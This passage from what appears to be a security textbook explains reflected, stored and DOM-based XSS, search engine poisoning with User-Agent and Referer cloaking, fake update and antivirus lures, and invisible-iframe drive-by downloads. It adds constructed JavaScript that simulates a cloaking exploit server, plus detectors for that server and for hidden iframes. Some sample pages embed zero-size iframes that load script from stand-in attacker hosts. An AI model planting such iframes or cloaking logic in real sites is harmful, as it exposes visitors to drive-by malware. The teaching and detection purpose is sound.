In a reflected XSS attack, when the attacker sends a spear phishing e‐mail or any other kind of lure to the user, the user must have an active session with the web application in question at the moment the crafted request is clicked. In comparison, in a stored XSS attack, the user who is viewing a crafted posting is already doing so in an active session, which eliminates the timing constraint that is a prerequisite of a reflected XSS attack.

In addition to stored and reflected attacks, a third XSS attack method is called a DOM‐based XSS attack. The DOM‐based XSS vulnerability is typically a side effect of a website that attempts to improve the user experience by customizing content for a given visitor with client‐side script. For a given web page constructed in HTML or XML format, there exists a DOM that describes the structure of that page and how that page is accessed and manipulated from the browser's perspective. When the browser renders the page, client‐side script may read a DOM property such as document.URL (or location.hash) that carries attacker‐controlled data and write it into the page through a sink such as innerHTML or document.write. A URL that contains an embedded and obfuscated malicious script then triggers execution much as in a reflected XSS attack, with one important difference for defenders: the payload may never be sent to the server at all (for example, when it rides in the URL fragment), so server‐side filtering and server logs do not see it.

Search Engine Poisoning

One method of luring potential victims to malware delivery servers is search engine poisoning (SEP). The main goal of SEP is for the black hats to inject links that point to their malicious servers into the top search results of any popular search engine. Links that are part of the top search results have the highest potential of being clicked by the user who issued the search. Therefore, the more poisoned links in the search results, the better the chance for the black hats to victimize users. This is why the process of deceiving a search engine into returning malicious links in its search results is called search engine poisoning. Black hats execute a series of steps to poison search engines.
First, the black hat creates bait pages that contain popular search keywords and phrases. These keywords and phrases are repeated in a bait page but interleaved with random words, phrases, and sentences, and combined with random images to make the page appear more legitimate to a web bot or crawler. Then the black hat launches mass e‐mail spam to advertise links to these bait pages. The black hat also posts those links to various social forums and compromised websites and distributes them through online advertising networks, or ad networks. Link farms are also set up to broaden the reach. A link farm is a coterie of websites where each website cross‐references every other site within the group through hyperlinks; a site in the farm may also build a directory of web pages that exists only to hold links. A link farm is another black hat venue for search engine optimization (SEO): it inflates the relevancy rating a search engine algorithm assigns to a website, because that algorithm assigns weights or values to inbound hyperlinks.

The goal of the bait page is to lead potential victims to the malware delivery server. How is the malware delivered if and when the victim reaches the harmless bait page? The victim actually never sees the bait page. The trick is in how the malware server processes each HTTP request and what content is returned to fulfill the request. First, the malware server needs to know where the request is coming from, that is, who or what entity is issuing the request, before deciding which content should be returned. The User‐Agent field in the HTTP request header discloses whether the entity claims to be a search engine crawler or a web browser, as shown in Figure 4-4.
Figure 4-4: User‐Agent and Referer (① user searches Google for “where can I get best iPad deals”; ② user follows a top result, and the request carries the browser's User‐Agent and a Referer pointing at the search results page)

For example, the Google web‐crawling bot named Googlebot is identified by the following User‐Agent string:

User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +

In this example, a regular user running the Safari browser on the Mac OS X operating system has the following User‐Agent signature:

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/600.1.17 (KHTML, like Gecko) Version/7.1 Safari/537.85.10

Besides computing the relevance of a web page, a modern search engine indexer has built‐in detection algorithms to identify potential malware scripts contained within a page and to assess the risk level of the overall page content. The search engine market is competitive, and a search engine can lose its market share quickly if users are frequently led to junk or malicious pages. Therefore, it is good business practice to safeguard users by preemptively filtering harmful results and presenting them with safe links. The exploit server is built to respond intelligently according to who is making the request, as illustrated in Figure 4-5.

Figure 4-5: Search Engine Poisoning (labels: Googlebot / Search Bot receives a bait page repeating keywords and phrases with random text and images; User searches for “best iPad deals”; Top Search Results seeded via Forums, Blogs, Popular Websites, Link Farms and Social Networking; Exploit Server keyed on Referer: Search Results or Referer: Ad Networks; a Direct Connection from a White Hat receives a fake 404 Not Found, blank or Under Construction page)

As shown in Figure 4-5, when a malware server detects that a search engine crawler is paying it a visit, the server presents a carefully constructed, innocuous bait page for the search engine bot to index (①).
When the malware server detects that an HTTP request was entered directly into a browser to reach the malware site, it presents a snooper page in return. The snooper page typically shows that the site is under construction or is completely blank, thus offering no content to the visitor. The snooper page is a crude strategy put in place to keep a low profile and turn white hats away from examining the site. Sometimes the malware server simply redirects a prying visitor to a well‐known site. As soon as the malware server detects that the request originates from a search engine results page (②, ③, ④), it returns the actual malicious content, because it knows a user has taken the bait and clicked a poisoned link (⑤).

The Referer field in the HTTP request header (the header name is spelled “Referer”, a misspelling preserved in the HTTP specification since the field was introduced) contains the evidence of the search engine results. Figure 4-4 illustrates an example where the user has entered “where can I get best iPad deals” into the Google search engine. When the user selects the top search result and follows the link, the Referer field carries the address of the Google search results page. In addition, the words from the search phrase entered by the user appear in that address as a URL parameter, which the black hats leverage to enhance the keywords and phrases contained in their bait pages, thus improving the potency of those bait pages in poisoning the search engine. (Major search engines have since stopped passing the full query in the Referer for most clicks, so this keyword side channel is far less useful today.) Note also that both User‐Agent and Referer are set by the client and are trivially spoofed, which is exactly what a defender exploits to unmask cloaking: fetch the same URL once as a crawler, once directly, and once with a search‐results Referer, and compare the responses.

The mainstream media has created a myth about SEP being a significant threat vector during newsworthy events. Research into the data generated by Blue Coat's 75 million WebPulse users indicated a disparity between the compiled results and the press reports. In past significant events between 2008 and 2013, which include natural disasters, sports finals, financial market meltdowns, deaths of celebrities, and so on, less than 0.01 percent of malicious links were activated due to SEP.
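The cloaking logic just described, and the check a defender runs against it, as an added example that is not code from the book or from any real exploit kit. The exploit server, its three pages, the ad‐network hostname and the probe identities are constructed for illustration; the only User‐Agent strings taken from the text are the Googlebot and Safari ones above, and nothing here touches the network.

```javascript
// Added example (not from the book): the cloaking decision an SEP exploit
// server makes from User-Agent and Referer, beside the check a defender runs
// to unmask it. The server, its pages, the ad-network host and the request
// samples are constructed for illustration; nothing is fetched from the net.

const SEARCH_HOSTS = /(^|\.)(google|bing|yahoo|duckduckgo)\.[a-z.]+$/i;
const AD_NETWORK_HOSTS = new Set(['ads.adnetwork.example']); // constructed

function lowerKeys(headers) {
  const out = {};
  for (const [k, v] of Object.entries(headers)) out[k.toLowerCase()] = v;
  return out;
}

function refererHost(ref) {
  try { return new URL(ref).hostname; } catch (e) { return ''; }
}

// The server's guess about who is asking. Both headers are client-supplied,
// so the server only needs the guess to be right for real victims.
function classifyVisitor(headers) {
  const h = lowerKeys(headers);
  const ua = h['user-agent'] || '';
  if (/\b(googlebot|bingbot|yandexbot|baiduspider|duckduckbot)\b/i.test(ua)) return 'crawler';
  const host = refererHost(h['referer'] || '');
  if (SEARCH_HOSTS.test(host)) return 'search-click';
  if (AD_NETWORK_HOSTS.has(host)) return 'ad-click';
  return 'direct';
}

// One response per visitor class, as the text describes: bait for the
// indexer, the exploit for anyone arriving from a search result or an ad,
// and a snooper page for everybody else.
const BAIT_PAGE = '<html><title>best iPad deals</title><body>best iPad deals, cheap iPad deals, ' +
  'iPad deals today. The quick brown fox. <img src="random1.jpg"> best iPad deals</body></html>';
const EXPLOIT_PAGE = '<html><body><iframe src="http://exploit.example/js.js" ' +
  'width="0" height="0"></iframe></body></html>';
const SNOOPER_PAGE = '<html><body>Site under construction</body></html>';

function sepServer(headers) {
  const who = classifyVisitor(headers);
  if (who === 'crawler') return { status: 200, body: BAIT_PAGE };
  if (who === 'search-click' || who === 'ad-click') return { status: 200, body: EXPLOIT_PAGE };
  return { status: 404, body: SNOOPER_PAGE };
}

// Defender's side: request the same URL under several identities and compare.
const BROWSER_UA = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/600.1.17 ' +
  '(KHTML, like Gecko) Version/7.1 Safari/537.85.10';
const PROBE_IDENTITIES = {
  crawler: { 'User-Agent': 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)' },
  direct: { 'User-Agent': BROWSER_UA },
  fromSearch: { 'User-Agent': BROWSER_UA, Referer: 'https://www.google.com/search?q=best+iPad+deals' },
  fromAd: { 'User-Agent': BROWSER_UA, Referer: 'https://ads.adnetwork.example/click?id=1' },
};

// fetchFn takes a header object and returns {status, body}. Here it is the
// simulated server; in practice it wraps an HTTP client hitting the suspect URL.
function probeCloaking(fetchFn) {
  const seen = {};
  for (const [name, headers] of Object.entries(PROBE_IDENTITIES)) {
    const r = fetchFn(headers);
    seen[name] = `${r.status}:${r.body.replace(/\s+/g, ' ').trim()}`;
  }
  const variants = new Set(Object.values(seen)).size;
  return { cloaked: variants > 1, variants, seen };
}
```

A site that answers differently to these probes is not automatically malicious (mobile and desktop variants, geo‐targeting and A/B tests all vary by User‐Agent), so treat a positive as a reason to pull the `fromSearch` body for inspection rather than as a verdict. On the defending web server's side, the converse lesson is that a Googlebot User‐Agent proves nothing; verifying a crawler means a reverse‐DNS lookup of the connecting IP, not a string match.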
This surprising finding may be attributed to the following factors:

■ Significant events are covered by all news organizations, which causes a search engine “clutter” effect. In other words, there is so much relevant and clean content (articles, commentaries, blogs) distributed across a large number of legitimate websites, such as reputable news media sites like CNN, NPR, and BBC, that the search engine produces real content as its top search results.

■ People are now drawn to social networking sites such as Facebook and Twitter to obtain their information. Therefore, the attack vectors are chiefly phishing e‐mails and malicious postings on well‐known online social media sites.

■ Search engines continue to improve their detection algorithms to sanitize search results.

Drive‐by Downloads and the Invisible Iframe

Drive‐by downloads are the payload that often sits at the end of an SEP chain. They are a scheme black hats employ to induce the download of malicious code from a crafted attack page when a user visits a compromised or purposely built malicious website. The goal of a drive‐by download is to inject malicious code into the user's system. In one approach, the black hats use social engineering to lure a user into accepting an offer and then manually downloading and running the malicious code behind the offer. A common bait is an offering of digital material relating to A‐list celebrities, such as a leaked nude video, that requires the user to download and install a “missing” video codec or to upgrade an existing version of a player program in order to view the movie. Figure 4-6 shows a fake Adobe Flash Player upgrade scheme that we downloaded.

Figure 4-6: Fake Video Player Update

First of all, you may notice that the displayed warning message is really just a web page that tries to simulate an Adobe update pop‐up window. This alone should have raised an alarm.
Second, there is the URL, “2‐”, which shows that this website is not affiliated with Adobe. Below the big yellow Accept and Install button, the text in small print reads, “Clicking any download button on this website will begin installation of InstallIQ, which manages installation of the products available on this website.” In other words, this is a fake warning message, and the executable has nothing to do with the Adobe Flash program. Clicking the Install button means the user agrees to install an unknown program published by an unknown software company that calls itself “InstallX, LLC” but names its software “adobeflashplayer.exe”. In this example, after completing the download step, we uploaded the binary to VirusTotal; it scored 24 out of 54 hits as Trojan adware.

Another common ploy is to instill fear in the user so that he or she acts without hesitation, for example by displaying an animation that falsifies evidence of malicious activity that appears to already exist on the user's system. The user is urged to download and install antivirus software immediately to remove the virus and sterilize the system. Of course the real malware is packaged as the fake antivirus software, and once installed it causes serious havoc on the user's system. Figure 4-7 shows fake antivirus scan results that prompt a user to act immediately to clean up their system.

Figure 4-7: Fake Antivirus Scanning

This malicious web page used an animated image ploy that pretends to perform a virus scan on the visitor's system. In this case, we were actually running on a Unix system, not on Microsoft Windows, which gives the game away: the “scan” is a canned animation that shows the same results to every visitor regardless of platform. The fake “Windows Security Alert” pop‐up prompts the user to click the Remove All button, but clicking anywhere on the web page will trigger the download and installation of a Trojan.
Social engineering may be one attack vector, but another tactic is more dangerous and completely bypasses the user through an insidious automatic background download and execution of malicious code to infect the user's system. In other words, the download process does not require user interaction at all. When a user visits a compromised website, the user's browser is redirected to an attack page, possibly through multiple layers of deflection using techniques such as HTTP redirection, an invisible iframe, or JavaScript execution within the browser. Figure 4-8 illustrates a common iframe‐based drive‐by download scheme.

Figure 4-8: Invisible Iframe (① the user's web browser sends an HTTP GET request to a well‐known website; ② the returned web page carries an advertising banner containing a hidden iframe; ③ the browser loads the page and renders the content, and the hidden frame triggers another download; ④ malicious JavaScript is fetched and executes; ⑤ the exploit runs and the host becomes a newly compromised host)

In this example, the user visits a well‐known but compromised website (①), and the page displayed to the user has an ad banner. Inside this ad banner is an invisible iframe; it is invisible because, as shown in the figure, it has zero dimensions and the hidden display style (②). The source of the iframe points to a piece of JavaScript, “js.js”, that is hosted on a malicious site in Russia (③). The browser automatically downloads js.js when processing the embedded iframe directive
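The zero‐size, `display:none` iframe in Figure 4-8 is exactly what a page scanner looks for when triaging a compromised site. The following is an added example, not code from the book: a small scanner that pulls every `<iframe>` out of a fetched page and reports the ones styled to be invisible, run here over a constructed sample page whose hostnames (`video.example`, `ads.example`, `malicious.example`) are placeholders. It generalizes slightly beyond the figure by also catching off‐screen, transparent and `hidden`‐attribute frames, which are the other ways the same trick is commonly dressed.

```javascript
// Added example (not from the book): find iframes that are present in the
// markup but invisible to the user, the drive-by pattern of Figure 4-8. The
// sample page and its hostnames are constructed for this example. A regex
// tag scanner is enough for quick triage; a production tool should use a
// real HTML parser and also resolve CSS classes and frames created by script.

// Parse the attributes of a single <iframe ...> tag into a lowercase map.
function parseAttrs(tag) {
  const attrs = {};
  const body = tag.replace(/^<\s*iframe\b/i, '').replace(/\/?>$/, '');
  const re = /([a-zA-Z_:][-a-zA-Z0-9_:.]*)\s*(?:=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  let m;
  while ((m = re.exec(body)) !== null) {
    let value = '';
    if (m[2] !== undefined) value = m[2];
    else if (m[3] !== undefined) value = m[3];
    else if (m[4] !== undefined) value = m[4];
    attrs[m[1].toLowerCase()] = value;
  }
  return attrs;
}

// Why a frame with these attributes would not be visible, if at all.
function hiddenReasons(attrs) {
  const reasons = [];
  const tiny = (v) => v !== undefined && parseInt(v, 10) <= 1;   // 0 or 1 pixel
  if (tiny(attrs.width) || tiny(attrs.height)) reasons.push('zero-size');
  const style = (attrs.style || '').toLowerCase().replace(/\s+/g, '');
  if (/display:none/.test(style)) reasons.push('display:none');
  if (/visibility:hidden/.test(style)) reasons.push('visibility:hidden');
  if (/(width|height):0(px|%)?(;|$)/.test(style)) reasons.push('zero-size-css');
  if (/(left|top):-\d{3,}/.test(style)) reasons.push('off-screen');
  if (/opacity:0(\.0+)?(;|$)/.test(style)) reasons.push('transparent');
  if (attrs.hidden !== undefined) reasons.push('hidden-attribute');
  return reasons;
}

// Return every iframe in the page that has at least one reason to be invisible.
function findHiddenIframes(html) {
  const found = [];
  const tagRe = /<iframe\b[^>]*>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const attrs = parseAttrs(m[0]);
    const reasons = hiddenReasons(attrs);
    if (reasons.length) found.push({ src: attrs.src || '', reasons });
  }
  return found;
}

// Constructed sample: a news page with one legitimate video embed and an ad
// banner carrying the hidden frame from the figure.
const SAMPLE_PAGE = `
<html><body>
<h1>Daily News</h1>
<iframe src="https://video.example/embed/123" width="560" height="315"></iframe>
<div class="ad-banner">
  <img src="https://ads.example/banner.png" alt="ad">
  <iframe src="http://malicious.example/js.js" width="0" height="0"
          style="display:none; visibility:hidden"></iframe>
</div>
</body></html>`;
```

`findHiddenIframes(SAMPLE_PAGE)` reports only the banner's frame, with its `src` and the three reasons it is invisible; the visible video embed is left alone. In practice the `src` values this returns are what you feed to the next stage of triage (reputation lookup, a detonation sandbox, or the cloaking probe from the SEP section), and a legitimate page can also carry zero‐size frames for analytics or tracking, so the result is a lead rather than a conviction.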
